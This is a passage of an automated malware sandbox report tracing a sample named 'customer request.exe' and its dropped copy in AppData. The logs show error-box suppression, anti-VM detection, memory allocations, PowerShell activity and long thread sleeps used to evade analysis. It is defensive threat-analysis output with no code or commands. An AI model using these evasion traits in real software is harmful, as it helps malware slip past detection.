Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR

Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 97B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 7810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: A7B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: B7B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: BDB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: CDB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: DDB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 11D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 3140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 3370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 5370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 90E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: A0E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: A2D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: B2D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: B8F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: C8F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 2A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Memory allocated: 2C00000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599545	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599320	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598886	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598655	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598222	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597451	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595915	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595583	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595458	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599780
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599123
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598887
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598778
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598446
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598334
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597749
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597202
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597091
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596749
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596640
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596531
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596421
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596312
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596093
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595874
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595752
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595126
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594452
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594343
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594234
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594125
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594015
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 593901
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 593780

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7728	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1267	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8179	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1365	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Window / User API: threadDelayed 6312	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Window / User API: threadDelayed 3533	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Window / User API: threadDelayed 2473
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Window / User API: threadDelayed 7384

Source: C:\Users\user\Desktop\customer request.exe TID: 6892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7152	Thread sleep count: 8179 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820	Thread sleep count: 1365 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7388	Thread sleep count: 6312 > 30	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7388	Thread sleep count: 3533 > 30	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599545s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599320s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599108s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598886s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598222s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597451s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595915s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595583s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595458s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe TID: 7384	Thread sleep time: -594140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7616	Thread sleep count: 2473 > 30
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7616	Thread sleep count: 7384 > 30
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599780s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599123s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -598887s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -598778s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -598446s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -598334s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -598077s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597749s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597202s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -597091s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596968s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596859s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596749s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596640s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596531s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596421s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596312s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596203s >= -30000s
